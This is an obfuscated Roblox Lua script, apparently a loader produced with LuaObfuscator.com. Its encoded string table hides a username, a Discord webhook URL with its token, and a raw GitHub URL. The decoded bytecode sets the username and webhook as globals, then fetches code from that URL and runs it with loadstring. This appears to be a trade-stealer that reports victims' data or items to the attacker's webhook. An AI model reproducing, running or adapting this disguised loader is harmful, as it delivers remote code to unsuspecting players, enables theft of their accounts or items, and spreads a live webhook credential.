--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.7) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v88=v5(v82,v19);v19=nil;return v88;else return v82;end end end);local function v20(v31,v32,v33) if v33 then local v83=(v31/(2^(v32-(2 -(1 + 0)))))%((5 -(1 + 2))^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v83-(v83%(932 -(857 + 74))) ;else local v84=2^(v32-1) ;return (((v31%(v84 + v84))>=v84) and (569 -(367 + 201))) or (927 -(214 + 713)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (879 -(282 + 595)) );v18=v18 + (1639 -(1523 + 114)) ;return (v36 * 256) + v35 ;end local function v23() local v37=0 + 0 ;local v38;local v39;local v40;local v41;while true do if (v37==(1 -0)) then return (v41 * (16778281 -((1025 -(892 + 65)) + 997))) + (v40 * ((159367 -92561) -(226 + (1929 -885)))) + (v39 * (1114 -858)) + v38 ;end if (v37==(117 -((58 -26) + 85))) then v38,v39,v40,v41=v1(v16,v18,v18 + 3 );v18=v18 + 4 + 0 ;v37=1 + 0 ;end end end local function v24() local v42=(792 -(416 + 26)) -(87 + 263) ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(183 -(67 + 113))) then if (v47==(0 + (0 -0))) then if (v46==(0 -(0 + 0))) then return v48 * (0 + 0) ;else v47=3 -2 ;v45=952 -(802 + 150) ;end elseif (v47==(5511 -3464)) then return ((v46==0) and (v48 * ((1 -0)/0))) or (v48 * NaN) ;end return v8(v48,v47-1023 ) * (v45 + (v46/((2 + 0)^52))) ;end if (v42==(997 -(915 + (144 -62)))) then v43=v23();v44=v23();v42=2 -(439 -(145 + 293)) ;end if (v42==((432 -(44 + 386)) + 0)) then v47=v20(v44,27 -6 ,31);v48=((v20(v44,1219 -((2555 -(998 + 488)) + 38 + 80) )==(2 -1)) and  -1) or (1 -0) ;v42=1 + 2 ;end if (v42==1) then v45=1 -0 ;v46=(v20(v44,1 + 0 + 0 ,811 -((1140 -(201 + 571)) + 423) ) * (((1144 -(116 + 1022)) -4)^(50 -(10 + 8)))) + v43 ;v42=7 -5 ;end end end local function v25(v49) local v50=(0 -0) -0 ;local v51;local v52;while true do if (v50==3) then return v6(v52);end if (v50==(2 + 0)) then v52={};for v89=3 -2 , #v51 do v52[v89]=v2(v1(v3(v51,v89,v89)));end v50=10 -7 ;end if (v50==(859 -(814 + 45))) then v51=nil;if  not v49 then v49=v23();if (v49==0) then return "";end end v50=2 -(1081 -(1020 + 60)) ;end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -(1 + 0) );v18=v18 + v49 ;v50=887 -(261 + 624) ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0 -0 ;end)();while true do if (v67~=(1764 -(454 + 1309))) then else if (v53~=(1 + 1)) then else v58[ #"-19"]=(function() return v21();end)();for v98= #"}",v23() do local v99=(function() return v21();end)();if (v20(v99, #"{", #"}")==(0 -0)) then local v141=(function() return 0 -0 ;end)();local v142=(function() return;end)();local v143=(function() return;end)();local v144=(function() return;end)();while true do if (v141==3) then if (v20(v143, #"xnx", #"xxx")~= #"]") then else v144[ #"0313"]=(function() return v60[v144[ #"http"]];end)();end v55[v98]=(function() return v144;end)();break;end if (v141~=(2 -1)) then else local v162=(function() return 285 -(134 + 151) ;end)();while true do if (v162==(1666 -(970 + 695))) then v141=(function() return 2;end)();break;end if (v162==0) then v144=(function() return {v22(),v22(),nil,nil};end)();if (v142==(1990 -(582 + 1408))) then local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175==0) then v176=(function() return 0;end)();while true do if (v176~=0) then else v144[ #"xnx"]=(function() return v22();end)();v144[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v142== #"}") then v144[ #"xxx"]=(function() return v23();end)();elseif (v142==(2 -0)) then v144[ #"gha"]=(function() return v23() -((7 -5)^16) ;end)();elseif (v142~= #"-19") then else local v183=(function() return 1824 -(1195 + 629) ;end)();local v184=(function() return;end)();while true do if (v183~=0) then else v184=(function() return 0;end)();while true do if ((0 -0)~=v184) then else v144[ #"-19"]=(function() return v23() -((243 -(187 + 54))^16) ;end)();v144[ #".com"]=(function() return v22();end)();break;end end break;end end end v162=(function() return 781 -(162 + 618) ;end)();end end end if (v141==2) then if (v20(v143, #" ", #"|")~= #",") then else v144[2 + 0 ]=(function() return v60[v144[2]];end)();end if (v20(v143,2,2 + 0 )~= #"\\") then else v144[ #"-19"]=(function() return v60[v144[ #"91("]];end)();end v141=(function() return 3;end)();end if (v141==0) then local v163=(function() return 0 -0 ;end)();while true do if (v163~=(0 -0)) then else v142=(function() return v20(v99,2, #"xxx");end)();v143=(function() return v20(v99, #"xnxx",6);end)();v163=(function() return 1 + 0 ;end)();end if (v163==(1637 -(1373 + 263))) then v141=(function() return 1;end)();break;end end end end end end for v100= #"[",v23() do v56,v100,v28=(function() return v54(v56,v100,v28);end)();end return v58;end break;end if (v67==(1000 -(451 + 549))) then if (v53==0) then local v96=(function() return 0;end)();while true do if (v96~=(1 + 0)) then else v56=(function() return {};end)();v57=(function() return {};end)();v96=(function() return 2;end)();end if (v96~=0) then else v54=(function() return function(v155,v156,v157) local v158=(function() return 0;end)();local v159=(function() return;end)();while true do if (v158==0) then v159=(function() return 0 -0 ;end)();while true do if ((0 -0)==v159) then local v177=(function() return 1384 -(746 + 638) ;end)();while true do if (v177~=(0 + 0)) then else v155[v156-#"~" ]=(function() return v157();end)();return v155,v156,v157;end end end end break;end end end;end)();v55=(function() return {};end)();v96=(function() return 1 -0 ;end)();end if (v96~=(343 -(218 + 123))) then else v53=(function() return 1582 -(1535 + 46) ;end)();break;end end end if (v53==1) then local v97=(function() return 0 + 0 ;end)();while true do if (v97~=(0 + 0)) then else v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v97=(function() return 1 + 0 ;end)();end if (v97==(1 -0)) then v60=(function() return {};end)();for v147= #"{",v59 do local v148=(function() return 0;end)();local v149=(function() return;end)();local v150=(function() return;end)();while true do if (v148~=(1467 -(899 + 568))) then else local v169=(function() return 0;end)();local v170=(function() return;end)();while true do if (v169==(0 + 0)) then v170=(function() return 0;end)();while true do if (v170~=(0 -0)) then else v149=(function() return v21();end)();v150=(function() return nil;end)();v170=(function() return 1;end)();end if (v170==(604 -(268 + 335))) then v148=(function() return 1;end)();break;end end break;end end end if (v148==(291 -(60 + 230))) then if (v149== #"<") then v150=(function() return v21()~=(572 -(426 + 146)) ;end)();elseif (v149==2) then v150=(function() return v24();end)();elseif (v149== #"xnx") then v150=(function() return v25();end)();end v60[v147]=(function() return v150;end)();break;end end end v97=(function() return 1 + 1 ;end)();end if (v97==(1458 -(282 + 1174))) then v53=(function() return 813 -(569 + 242) ;end)();break;end end end v67=(function() return 1;end)();end end end end local function v29(v61,v62,v63) local v64=v61[2 -(2 -1) ];local v65=v61[2];local v66=v61[1 + 2 ];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1025 -(53 + 653 + 318) ;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -((1990 -(542 + 196)) -((1098 -(142 + 235)) + 530)) ;local v77={};local v78={};for v85=1271 -(945 + 326) ,v76 do if ((2996>=2654) and (v85>=v70)) then v74[v85-v70 ]=v75[v85 + 1 ];else v78[v85]=v75[v85 + (2 -1) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[701 -(271 + 429) ];if (v81<=(3 + 0)) then if (v81<=1) then if (v81==((6804 -5304) -(1408 + 92))) then do return;end else v78[v80[2]]=v80[1089 -(461 + 625) ];end elseif (v81==(1290 -(993 + 295))) then local v103=0 + 0 ;local v104;local v105;local v106;local v107;while true do if ((3978>2104) and (v103==(1173 -((895 -477) + 753)))) then for v164=v104,v73 do v107=v107 + 1 + 0 + 0 ;v78[v164]=v105[v107];end break;end if (v103==(1 + 0 + 0)) then v73=(v106 + v104) -(1 + 0) ;v107=0 + 0 ;v103=531 -(406 + 123) ;end if ((2995>1541) and (v103==(1769 -(1749 + 20)))) then v104=v80[(978 -(553 + 424)) + 1 ];v105,v106=v71(v78[v104](v13(v78,v104 + (1 -0) ,v80[3])));v103=1323 -(1249 + 73) ;end end else local v108;local v109,v110;local v111;local v112;v78[v80[1 + 1 ]]=v80[1148 -(411 + 55 + 679) ];v72=v72 + (2 -1) ;v80=v68[v72];v63[v80[3]]=v78[v80[5 -3 ]];v72=v72 + ((1886 + 15) -(106 + 1794)) ;v80=v68[v72];v78[v80[2]]=v80[1 + 2 + 0 ];v72=v72 + 1 + 0 ;v80=v68[v72];v63[v80[1 + 2 ]]=v78[v80[5 -3 ]];v72=v72 + (2 -1) ;v80=v68[v72];v78[v80[116 -(2 + 2 + 110) ]]=v63[v80[587 -(33 + 24 + 527) ]];v72=v72 + (1428 -(41 + 1386)) ;v80=v68[v72];v78[v80[105 -(17 + 86) ]]=v63[v80[3 + 0 ]];v72=v72 + 1 ;v80=v68[v72];v112=v80[2];v111=v78[v80[6 -(2 + 1) ]];v78[v112 + (2 -1) ]=v111;v78[v112]=v111[v80[4]];v72=v72 + (167 -(122 + 44)) ;v80=v68[v72];v78[v80[(4 -2) -0 ]]=v80[9 -(15 -9) ];v72=v72 + 1 ;v80=v68[v72];v112=v80[2 + (0 -0) ];v109,v110=v71(v78[v112](v13(v78,v112 + 1 + 0 ,v80[5 -2 ])));v73=(v110 + v112) -(66 -(30 + (89 -54))) ;v108=(0 -0) + 0 ;for v145=v112,v73 do local v146=0;while true do if (v146==((366 + 891) -((5040 -3997) + 214))) then v108=v108 + ((1554 -(1126 + 425)) -2) ;v78[v145]=v109[v108];break;end end end v72=v72 + (1213 -(323 + 889)) ;v80=v68[v72];v112=v80[(758 -(239 + 514)) -3 ];v78[v112]=v78[v112](v13(v78,v112 + 1 ,v73));end elseif ((3249>953) and (v81<=5)) then if ((v81>(584 -(361 + 219))) or (3273>4573)) then v78[v80[322 -(53 + 267) ]]();else v63[v80[1 + 2 ]]=v78[v80[415 -(15 + 398) ]];end elseif (v81<=(988 -(18 + 964))) then local v136=v80[2];local v137=v78[v80[3]];v78[v136 + (3 -(1 + 1)) ]=v137;v78[v136]=v137[v80[4]];elseif ((v81==(5 + (407 -(118 + 287)))) or (3151<1284)) then local v151=v80[2 + 0 ];v78[v151]=v78[v151](v13(v78,v151 + 1 ,v73));else v78[v80[852 -((78 -58) + 830) ]]=v63[v80[3 + (1121 -(118 + 1003)) ]];end v72=v72 + (127 -(116 + 10)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!083O0003083O00557365726E616D65030E3O00426F2O627954686554726164657203073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323835372O38373934363439333137332O372F63524448716A6B426C7163523479474A55506C5F5774726550575F75413132415A616C48534854735A466B61396E324A534A61316743536E4858545F4465675049384544030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403403O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F646F736C6F626F6479646F6564792F782F6D61696E2F6D61696E2E6C7561000C3O0012033O00023O00124O00013O00124O00043O00124O00033O00124O00053O00122O000100063O00202O00010001000700122O000300086O000100039O0000022O00053O000100016O00017O00",v9(),...);
